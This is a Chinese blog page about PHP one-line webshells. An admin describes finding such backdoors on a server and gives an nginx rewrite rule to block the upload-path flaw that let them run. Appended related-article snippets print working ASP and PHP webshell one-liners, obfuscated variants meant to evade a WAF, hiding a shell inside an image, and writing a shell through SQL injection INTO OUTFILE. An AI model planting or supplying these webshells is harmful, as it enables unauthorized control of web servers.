关于php一句话木马

服务器上发现被植了很多木马,而且还让人肆意使用...NND

<?php @eval($_POST['c']);?>  

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>

仅此做个记录,php一定要做好过滤系统。一定要处理上传的东西。

nginx 上传漏洞及 discuz 漏洞处理

由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码

简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码

对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行

Nginx.conf代码  

  1. rewrite ^/bbs/data/.*\.(jsp|php)$ http://www.xxx.com/ break;

其他如source及其他文件夹下也存在各种各样的问题,简单的处理方法也是禁止php的运行

时间: 2024-10-12 13:00:57

关于php一句话木马的相关文章

脚本后门注入图片新方法&lt;图片+一句话木马&gt;

创建一个 shell.php 的一句话木马,通过 window 下 copy 命令 copy 123.png+shell.php  123.png 重新生成一个 123.png 的图片. 上传到服务服务器上,直接拿菜刀连.

各种过安全狗一句话木马

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request("x")%> <%execute(Y)%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 这个是90sec发的 <%eval""&("e"&"v"&&

渗透技术--SQL注入写一句话木马原理

讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\log1.txt' 这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面.利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell. 本地的目标站点来实战一下,我们的目的是在目标的物理路径D:/WWW/下面生成一个php文件,从而可以使我们用菜刀连接上去: 先简单的判断

常见的一句话木马

一句话木马入侵原理 <%execute request("#")%>是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件. 仔细观察一下<%execute request("#")%>这句代码,括号里的"#"是我们一句话的密码,我们可以把它改成任意字符,这样可以避免别人发现我们的一句话木马后,轻松的通过它捡个大便宜,如果我们上传的一句话代码为<%execute request("

一句话木马

1.一句话说明 常用的一句话有冰狐浪子的一句话,蓝屏的,lack2的,当然还有海洋的.我们如果知道了一句话的原理.自己也可以很轻松的写一个. <%execute(request("cmd"))%> <%execute request("1")%> ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密码a 2.简单演示 1>.一句话你要写入数据库,数据库必须是asp格式或者我们能够通过备份备份为asp格式.用客户端连接这个asp的数据库.

关于asp、php,jps一句话木马--中国菜刀使用

工具下载地址:http://pan.baidu.com/s/1o6jxAgq 这里的asp后门不指像那些一句话木马.砍客.冰狐.明小子之类的b/s型的,只指像cmd.asp或2005a.asp的. 第一个,来看zzzeva免fso的cmd.asp 代码如下:<form method="post"> <input type=text name="cmd" size=60> <input type=submit value="ru

DBO权限日志备份专用一句话木马 - 寒龙网出品 以前的博客站因为程序错乱改为反病毒联盟后 本博客基于博客园地 感谢关注

备分专用一句话 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小. 日志备分WEBSHELL标准的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式) 2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表) 3.InjectionURL';backup lo

常用一句话木马

asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> 其他一句话木马: <%eval request("value")%&g

一句话木马(webshell)是如何执行命令的

在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析. 首先我们先看一个原始而又简单的php一句话木马. <?php @eval($_POST['cmd']); ?> 看到这里不得不赞美前辈的智慧. 对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过pos

PHP 一句话木马

eval 函数 eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾 如果没有在代码字符串中调用 return 语句,则返回 NULL.如果代码中存在解析错误,则 eval() 函数返回 false eval 函数的一般用法 eval() 函数用于简单的文本合并 <?php $string='cup'; $name='coffee'; $str='This is a $string with my $name in it.'; echo $st